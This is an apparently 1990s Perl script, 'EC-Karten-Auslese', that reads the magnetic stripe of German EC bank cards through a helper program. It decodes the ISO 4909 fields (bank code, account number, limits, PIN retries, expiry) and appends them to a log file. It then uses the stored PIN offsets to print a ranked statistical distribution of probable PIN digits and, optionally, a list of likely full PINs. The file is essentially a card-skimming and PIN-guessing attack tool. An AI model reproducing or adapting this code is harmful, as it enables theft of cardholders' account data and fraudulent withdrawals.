#!/usr/bin/perl

$calculate_all_pins = 0;

$t5{"00001"} = "0";
$t5{"10000"} = "1";
$t5{"01000"} = "2";
$t5{"11001"} = "3";
$t5{"00100"} = "4";
$t5{"10101"} = "5";
$t5{"01101"} = "6";
$t5{"11100"} = "7";
$t5{"00010"} = "8";
$t5{"10011"} = "9";
$t5{"01011"} = "a";
$t5{"11010"} = ";";
$t5{"00111"} = "c";
$t5{"10110"} = "=";
$t5{"01110"} = "e";
$t5{"11111"} = "?";

if($#ARGV >= $[) {
  open(LOG, "<log")||die "Logfile not found!";
  while(<LOG>) {
    if(/$ARGV[0]/o && /^[^()]*$/) {
      &parse_iso4909($_);
    }
  }
  close(LOG);
  exit;
}

print "EC-Karten-Auslese 1.0\n";
open(CARD,"./cardread|");
$data = <CARD>;
close(CARD);
print "Vielen Dank.\n\nRohdaten: \n$data\n";
$data =~ /11010/;
$data =~ s/^$`//;
$data =~ s/(.....)/&replace($1)/eg;
$data =~ s/(\?.).*$/$1/;
open(LOG, ">>log");
print LOG $data;
close(LOG);
print "Daten nach Charset 5:\n$data\nAufschluesselung nach ISO 4909:\n";
&parse_iso4909($data);

sub replace {
  if(defined($t5{$_[0]})) {
    $t5{$_[0]};
  } else {
    "($_[0])";
  }
}

sub parse_iso4909 {
  local($data) = shift;

  ($start_sentinel, $data) = $data =~ /^(;)(.*)/;
  ($format_code, $data) = $data =~ /^(..)(.*)/;
  ($dummy, $industry, $issuer, $account, $checksum, $data) = $data =~ /^((..)(\d{1,9})\=(\d{1,23})(\d))?\=(.*)/;
  ($country_code, $currency, $currency_exponent, $data) = $data =~ /^(=|...)(...)(.)(.*)/;
  ($amount_per_cycle, $amount_remaining, $cycle_begin, $cycle_length, $data) = $data =~ /^(....)(....)(....)(..)(.*)/;
  ($retries, $pinalgorithm, $offset_1, $data) = $data =~ /^(.)(..)(....)(.*)/;
  ($interchange, $account_type, $service_restriction, $ta_san1, $sr_san1, $ta_san2, $sr_san2, $data) = $data =~ /^(.)(.)(.)(.)(.)(.)(.)(.*)/;
  ($expiry_year, $expiry_month, $sequence_number, $data) = $data =~ /^(..)(..)(.)(.*)/;
  ($dummy, $security_method, $security_parameter, $data) = $data =~ /^(=|(.)(........))(.*)/;
  ($san1, $san2, $relay, $dummy, $ccd, $data) = $data =~ /^(\d*)=(\d*)=(.)(=|(......))(.*)/;
  ($last_transaction_year, $last_transaction_day, $offset_2, $offset_3, $data) = $data =~ /^(.)(...)(....)(....)(.*)/;
  ($rest, $end_sentinel, $lrc) = $data =~ /^(.*)\?(.)/;
  print "BLZ: $issuer, Kontonummer: $account, Kartenfolgenummer: $sequence_number\n";
  if($amount_per_cycle ne "0000") {
    print "Zulaessige Maximalabhebung pro " . $cycle_length . " Tage: " . $amount_per_cycle . ("0" x $currency_exponent) . "\n";
    if($amount_remaining ne "0000") {
      print "Davon noch verfuegbar: " . $amount_remaining . ("0" x $currency_exponent) . "\n";
    }
  }
  print "Verbleibende Fehlversuche fuer PIN-Eingabe: " . $retries . "\n";
  print "Karte gueltig bis: $expiry_month/$expiry_year\n";
  print "Letzte Transaktion: " . $last_transaction_day . "ter Tag 199$last_transaction_year\n";
  print "Offset 1: $offset_1, Offset 2 (nicht mehr in Gebrauch?): $offset_2, Offset 3: $offset_3\n";
  print "Sicherheitsmerkmal: $security_method, Parameter: $security_parameter\n" if($security_method);


  if(($expiry_year > 70) && ($expiry_year < 98)) {
    open(OFFSET,"./offset 0 $offset_1 $offset_3|");
    print "Alte EC-Karte.\n";
  } else { 
    open(OFFSET,"./offset 5 $offset_1 $offset_2 $offset_3|");
    print "Neue EC-Karte.\n";
  }
  print "\nStatistische PIN-Verteilung (Wahrscheinlichkeit von oben nach unten absteigend, \nStellen der PIN getrennt):\n";

  $col = 0;
  for($i=0; $i<10; $i++) {
    $output[$i] = "";
  }

  for($i = 0; $i<4; $i++) {
    $line = <OFFSET>;
    $col = 0;
    for($j = 0; $j < 10; $j++) {
      ($rand{$j}, $line) = $line =~ /(\S+)\s+(.*)/g;
    }
    foreach $k (sort sortrand (0..9)) {
      $output[$col++] .= $k . " ";
    }
  }

  for($j = 0; $j < 10; $j++) {
    print $output[$j] . "\n";
  }
  if($calculate_all_pins) {
    while(<OFFSET>) {
      split;
      $pins{$_[0]} = $_[1];
    }
    $i = 0;
    foreach $k (sort { $pins{$b} <=> $pins{$a} } keys(%pins)) {
      print "$k ";
      last if $i++ > 450;
      print "\n" if !($i % 16);
    }
  }
  print "\n";
}

sub sortrand {
    if( $rand{$b} <=> $rand{$a} ) {
	$rand{$b} <=> $rand{$a};
    } else {
	$b <=> $a;
    }
} 
